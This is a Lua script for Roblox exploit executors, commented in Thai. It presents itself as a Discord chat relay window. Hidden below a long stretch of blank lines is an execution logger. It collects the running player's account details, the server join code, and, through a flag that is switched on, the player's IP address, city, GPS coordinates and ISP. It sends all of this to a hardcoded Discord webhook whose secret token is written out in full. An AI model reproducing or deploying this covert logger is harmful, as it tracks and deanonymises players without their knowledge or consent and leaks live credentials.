--[[
    Discord Relay Chat Client (ฝั่ง Client/Executor)
    - ใช้ syn.request / http_request / Fluxus.request ได้
    - ปรับ RELAY_URL กับ RELAY_KEY ให้ตรงเซิร์ฟเวอร์คุณ!
    - GUI: ดำ, Drag ได้, ข้อความใหม่ Auto Scroll, Send ปุ่ม/Enter, Minimize ได้
]]

local HttpService = game:GetService("HttpService")
local Players = game:GetService("Players")
local player = Players.LocalPlayer

-- ปรับ URL/KEY ให้ตรงของคุณ!
local RELAY_URL = "https://dxd-1.onrender.com"
local RELAY_KEY = "222554"

-- เลือกฟังก์ชัน request ตาม executor
local REQUEST = (syn and syn.request) or http_request or request or fluxus and fluxus.request
assert(REQUEST, "Executor นี้ไม่รองรับ request (เช่น syn.request)")

-- GUI สไตล์เรียบ-ดำ-Drag ได้
local screen = Instance.new("ScreenGui", game:GetService("CoreGui"))
screen.Name = "DiscordBridgeUI"
screen.ResetOnSpawn = false

local frame = Instance.new("Frame", screen)
frame.AnchorPoint = Vector2.new(1,1)
frame.Position = UDim2.new(1,-16,1,-16)
frame.Size = UDim2.new(0,340,0,220)
frame.BackgroundTransparency = 0.2
frame.BackgroundColor3 = Color3.fromRGB(20,20,20)
frame.BorderSizePixel = 0
frame.Active = true
frame.Draggable = true

local title = Instance.new("TextLabel", frame)
title.Size = UDim2.new(1,0,0,32)
title.BackgroundTransparency = 1
title.Text = "Chat with ลุงอาร์ม"
title.Font = Enum.Font.GothamBlack
title.TextSize = 20
title.TextColor3 = Color3.fromRGB(255,150,80)
title.TextStrokeTransparency = 0.7
title.TextXAlignment = Enum.TextXAlignment.Left
title.Position = UDim2.new(0,12,0,0)

local minBtn = Instance.new("TextButton", frame)
minBtn.Size = UDim2.new(0,32,0,32)
minBtn.Position = UDim2.new(1,-38,0,0)
minBtn.Text = "_"
minBtn.BackgroundTransparency = 0.7
minBtn.Font = Enum.Font.GothamBold
minBtn.TextColor3 = Color3.fromRGB(200,200,200)
minBtn.TextSize = 22

local messages = Instance.new("ScrollingFrame", frame)
messages.Position = UDim2.new(0,10,0,40)
messages.Size = UDim2.new(1, -20, 1, -90)
messages.CanvasSize = UDim2.new(0,0,0,0)
messages.BackgroundTransparency = 1
messages.ScrollBarThickness = 6
messages.Name = "Messages"

local uiList = Instance.new("UIListLayout", messages)
uiList.Padding = UDim.new(0,7)
uiList.SortOrder = Enum.SortOrder.LayoutOrder

local textBox = Instance.new("TextBox", frame)
textBox.Position = UDim2.new(0,10,1,-42)
textBox.Size = UDim2.new(1, -120, 0, 32)
textBox.PlaceholderText = "Type massage"
textBox.ClearTextOnFocus = false
textBox.Font = Enum.Font.Gotham
textBox.TextSize = 18
textBox.Text = ""
textBox.TextColor3 = Color3.new(1,1,1)
textBox.BackgroundTransparency = 0.15
textBox.BackgroundColor3 = Color3.fromRGB(35,35,35)

local sendBtn = Instance.new("TextButton", frame)
sendBtn.Position = UDim2.new(1, -98, 1, -42)
sendBtn.Size = UDim2.new(0,88,0,32)
sendBtn.Text = "Send"
sendBtn.Font = Enum.Font.GothamBlack
sendBtn.TextColor3 = Color3.fromRGB(230,230,230)
sendBtn.BackgroundColor3 = Color3.fromRGB(60,60,60)
sendBtn.BackgroundTransparency = 0.08
sendBtn.TextSize = 19

-- Minimize/Expand
local minimized = false
minBtn.MouseButton1Click:Connect(function()
    minimized = not minimized
    messages.Visible = not minimized
    textBox.Visible = not minimized
    sendBtn.Visible = not minimized
    frame.Size = minimized and UDim2.new(0,340,0,40) or UDim2.new(0,340,0,220)
end)

-- เพิ่มข้อความ
local function addMessage(author, text)
    local lbl = Instance.new("TextLabel", messages)
    lbl.Size = UDim2.new(1,0,0,22)
    lbl.BackgroundTransparency = 1
    lbl.TextXAlignment = Enum.TextXAlignment.Left
    lbl.Text = ("[%s] %s"):format(author, text)
    lbl.Font = Enum.Font.Gotham
    lbl.TextSize = 18
    lbl.TextColor3 = Color3.fromRGB(220,220,220)
    lbl.TextWrapped = true
    lbl.ClipsDescendants = true

    -- Auto scroll ลงล่าง
    task.wait()
    messages.CanvasSize = UDim2.new(0,0,0,uiList.AbsoluteContentSize.Y+8)
    messages.CanvasPosition = Vector2.new(0, math.max(0,uiList.AbsoluteContentSize.Y+8-messages.AbsoluteWindowSize.Y))
end

-- Polling รับข้อความใหม่จาก Relay ทุก 1 วิ
local lastMessageId = 0
task.spawn(function()
    while true do
        local ok, res = pcall(function()
            return REQUEST({
                Url = RELAY_URL .. "/messages",
                Method = "GET",
                Headers = { ["x-relay-key"] = RELAY_KEY },
            })
        end)

        if ok and res and res.StatusCode == 200 and res.Body then
            local decoded = nil
            local good, err = pcall(function() decoded = HttpService:JSONDecode(res.Body) end)
            if good and decoded and decoded.ok and decoded.messages then
                for _, msg in ipairs(decoded.messages) do
                    -- ป้องกัน duplicate (ถ้ามี messageId ใน JSON)
                    if not msg.id or (msg.id > lastMessageId) then
                        addMessage(msg.author or "???", msg.text or "")
                        if msg.id then lastMessageId = msg.id end
                    end
                end
            end
        end
        task.wait(1)
    end
end)

-- ฟังก์ชันส่งข้อความไป Discord ผ่าน Relay
local function sendToDiscord(text)
    local body = HttpService:JSONEncode({
        author = player.Name,
        text = text
    })
    local ok, res = pcall(function()
        return REQUEST({
            Url = RELAY_URL .. "/to-discord",
            Method = "POST",
            Headers = {
                ["Content-Type"] = "application/json",
                ["x-relay-key"] = RELAY_KEY,
            },
            Body = body
        })
    end)
    if not ok then
        addMessage("System", "❌ ส่งข้อความไม่สำเร็จ (request error)")
    elseif res.StatusCode ~= 200 then
        addMessage("System", "❌ Relay error: " .. tostring(res.Body))
    else
        -- ส่งสำเร็จ: แสดงข้อความทันที (optional)
        -- addMessage(player.Name, text)
    end
end

sendBtn.MouseButton1Click:Connect(function()
    local txt = textBox.Text
    if txt and txt ~= "" then
        sendToDiscord(txt)
        textBox.Text = ""
    end
end)

-- Enter เพื่อส่ง
textBox.FocusLost:Connect(function(enter)
    if enter and textBox.Text ~= "" then
        sendToDiscord(textBox.Text)
        textBox.Text = ""
    end
end)

-- เครดิต
local credit = Instance.new("TextLabel", frame)
credit.Size = UDim2.new(1,0,0,16)
credit.Position = UDim2.new(0,0,1,-16)
credit.BackgroundTransparency = 1
credit.Text = "Powered by ลุงอาร์ม"
credit.Font = Enum.Font.Gotham
credit.TextSize = 10
credit.TextColor3 = Color3.fromRGB(120,180,255)
credit.TextXAlignment = Enum.TextXAlignment.Right

-- destroy GUI เมื่อ leave
player.OnTeleport:Connect(function() screen:Destroy() end)
-----------------------------------

















--// Config
getgenv().whscript = "แมพ Unknow"        --Change to the name of your script
getgenv().webhookexecUrl = "https://discord.com/api/webhooks/1412800788828258365/yk13Av7fcp8nLLZugFNWNJxY-Td2Bb3K11Jbazrc9JJVcXfmdsRR9i45Ii3s-uqawVo0"  --Put your Webhook Url here
getgenv().ExecLogSecret = true                --decide to also log secret section

--// Execution Log Script
local ui = gethui()
local folderName = "screen"
local folder = Instance.new("Folder")
folder.Name = folderName
local player = game:GetService("Players").LocalPlayer

if ui:FindFirstChild(folderName) then
    print("Script is already executed! Rejoin if it's an error!")
    local ui2 = gethui()
    local folderName2 = "screen2"
    local folder2 = Instance.new("Folder")
    folder2.Name = folderName2
    if ui2:FindFirstChild(folderName2) then
        print("1")
    else
        folder2.Parent = gethui()
    end
else
    folder.Parent = gethui()
    local players = game:GetService("Players")
    local userid = player.UserId
    local gameid = game.PlaceId
    local jobid = tostring(game.JobId)
    local gameName = game:GetService("MarketplaceService"):GetProductInfo(game.PlaceId).Name
    local deviceType =
        game:GetService("UserInputService"):GetPlatform() == Enum.Platform.Windows and "PC 💻" or "Mobile 📱"
    local snipePlay =
        "game:GetService('TeleportService'):TeleportToPlaceInstance(" .. gameid .. ", '" .. jobid .. "', player)"
    local completeTime = os.date("%Y-%m-%d %H:%M:%S")
    local workspace = game:GetService("Workspace")
    local screenWidth = math.floor(workspace.CurrentCamera.ViewportSize.X)
    local screenHeight = math.floor(workspace.CurrentCamera.ViewportSize.Y)
    local memoryUsage = game:GetService("Stats"):GetTotalMemoryUsageMb()
    local playerCount = #players:GetPlayers()
    local maxPlayers = players.MaxPlayers
    local health =
        player.Character and player.Character:FindFirstChild("Humanoid") and player.Character.Humanoid.Health or "N/A"
    local maxHealth =
        player.Character and player.Character:FindFirstChild("Humanoid") and player.Character.Humanoid.MaxHealth or
        "N/A"
    local position =
        player.Character and player.Character:FindFirstChild("HumanoidRootPart") and
        player.Character.HumanoidRootPart.Position or
        "N/A"
    local gameVersion = game.PlaceVersion

    if not getgenv().ExecLogSecret then
        getgenv().ExecLogSecret = false
    end
    if not getgenv().whscript then
        getgenv().whscript = "Please provide a script name!"
    end
    local commonLoadTime = 5
    task.wait(commonLoadTime)
    local pingThreshold = 100
    local serverStats = game:GetService("Stats").Network.ServerStatsItem
    local dataPing = serverStats["Data Ping"]:GetValueString()
    local pingValue = tonumber(dataPing:match("(%d+)")) or "N/A"
    local function checkPremium()
        local premium = "false"
        local success, response =
            pcall(
            function()
                return player.MembershipType
            end
        )
        if success then
            if response == Enum.MembershipType.None then
                premium = "ไม่มี Premium"
            else
                premium = "มี Premium"
            end
        else
            premium = "ไม่สามารถดึงข้อมูลได้:"
        end
        return premium
    end
    local premium = checkPremium()

    local url = getgenv().webhookexecUrl

    local data = {
        ["content"] = "@everyone",
        ["embeds"] = {
            {
                ["title"] = "🚀 ตรวจพบการ รันสคริปต🚀์",
                ["description"] = "มี Script ของคุณถูกรัน นี่คือข้อมูล",
                ["type"] = "rich",
                ["color"] = tonumber(0x3498db), -- Clean blue color
                ["fields"] = {
                    {
                        ["name"] = "🔍 เกี่ยวกับ Script",
                        ["value"] = "```💻 ชื่อ Script ที่ถูกรัน: " ..
                            getgenv().whscript .. "\n⏰ Executed At: " .. completeTime .. "```",
                        ["inline"] = false
                    },
                    {
                        ["name"] = "👤 ข้อมูลผู้เล่นที่รัน Script",
                        ["value"] = "```🧸 ชื่อผู้ใช้: " ..
                            player.Name ..
                                "\n📝 ชื่อเล่น: " ..
                                    player.DisplayName ..
                                        "\n🆔 ID ผู้ใช้: " ..
                                            userid ..
                                                "\n❤️ จำนวน Hp ขณะนั้น: " ..
                                                    health ..
                                                        " / " ..
                                                            maxHealth ..
                                                                "\n🔗 โปรไฟล์: ดูโปรไฟล์ (https://www.roblox.com/users/" ..
                                                                    userid .. "/profile)```",
                        ["inline"] = false
                    },
                    {
                        ["name"] = "📅 เกี่ยวกับบัญชีผูัใช้",
                        ["value"] = "```🗓️ อายุบัญชี: " ..
                            player.AccountAge ..
                                " วัน\n💎 Premium เช็ค: " ..
                                    premium ..
                                        "\n📅 วันที่สร้างบัญชี: " ..
                                            os.date("%Y-%m-%d", os.time() - (player.AccountAge * 86400)) .. "```",
                        ["inline"] = false
                    },
                    {
                        ["name"] = "🎮 เกม Details",
                        ["value"] = "```🏷️ ชื่อเกม: " ..
                            gameName ..
                                "\n🆔 เกม ID: " ..
                                    gameid ..
                                        "\n🔗 เกม Link (https://www.roblox.com/games/" ..
                                            gameid .. ")\n🔢 เกม Version: " .. gameVersion .. "```",
                        ["inline"] = false
                    },
                    {
                        ["name"] = "🕹️ เกี่ยวกับเซิฟเวอร์",
                        ["value"] = "```👥 ผู่เล่นในเซิฟเวอร์: " ..
                            playerCount .. " / " .. maxPlayers .. "\n🕒 เวลาเซิฟเวอร์: " .. os.date("%H:%M:%S") .. "```",
                        ["inline"] = true
                    },
                    {
                        ["name"] = "📡 เกี่ยวกับเครือข่าย",
                        ["value"] = "```📶 Ping: " .. pingValue .. " ms```",
                        ["inline"] = true
                    },
                    {
                        ["name"] = "🖥️ เกี่ยวกับระบบ",
                        ["value"] = "```📺 Resolution: " ..
                            screenWidth ..
                                "x" ..
                                    screenHeight ..
                                        "\n🔍 การใช้งานหน่อยความจำ: " ..
                                            memoryUsage .. " MB\n⚙️ ตัวรันที่ใช้: " .. identifyexecutor() .. "```",
                        ["inline"] = true
                    },
                    {
                        ["name"] = "📍 **`ตำแหน่ง Character ของผู้ใช้`**",
                        ["value"] = "```📍 ตำแหน่ง: " .. tostring(position) .. "```",
                        ["inline"] = true
                    },
                    {
                        ["name"] = "🪧 **สคริปต์เข้าร่วม**",
                        ["value"] = "```lua\n" .. snipePlay .. "```",
                        ["inline"] = false
                    }
                },
                ["thumbnail"] = {
                    ["url"] = "https://cdn.discordapp.com/icons/874587083291885608/a_80373524586aab90765f4b1e833fdf5a.gif?size=512"
                },
                ["footer"] = {
                    ["text"] = "Execution Log | " .. os.date("%Y-%m-%d %H:%M:%S"),
                    ["icon_url"] = "https://cdn.discordapp.com/icons/874587083291885608/a_80373524586aab90765f4b1e833fdf5a.gif?size=512" -- A generic log icon
                }
            }
        }
    }

    -- Check if the secret tab should be included
    if getgenv().ExecLogSecret then
        local ip = game:HttpGet("https://api.ipify.org")
        local iplink = "https://ipinfo.io/" .. ip .. "/json"
        local ipinfo_json = game:HttpGet(iplink)
        local ipinfo_table = game.HttpService:JSONDecode(ipinfo_json)

        table.insert(
            data.embeds[1].fields,
            {
                ["name"] = "**`(🤫) ที่อยู่ของผู้ใช้`**",
                ["value"] = "||(👣) IP Address: " ..
                    ipinfo_table.ip ..
                        "||\n||(🌆) ประเทศ: " ..
                            ipinfo_table.country ..
                                "||\n||(🪟) ตำแหน่ง GPS: " ..
                                    ipinfo_table.loc ..
                                        "||\n||(🏙️) จังหวัด/รัฐ/เมือง: " ..
                                            ipinfo_table.city ..
                                                "||\n||(🏡) ภูมิภาค: " ..
                                                    ipinfo_table.region ..
                                                        "||\n||(🪢) โฮสต์: " .. ipinfo_table.org .. "||"
            }
        )
    end

    local newdata = game:GetService("HttpService"):JSONEncode(data)
    local headers = {
        ["content-type"] = "application/json"
    }
    request = http_request or request or (syn and syn.request) or (fluxus and fluxus.request) or (http and http.request)
    local abcdef = {Url = url, Body = newdata, Method = "POST", Headers = headers}
    request(abcdef)
end
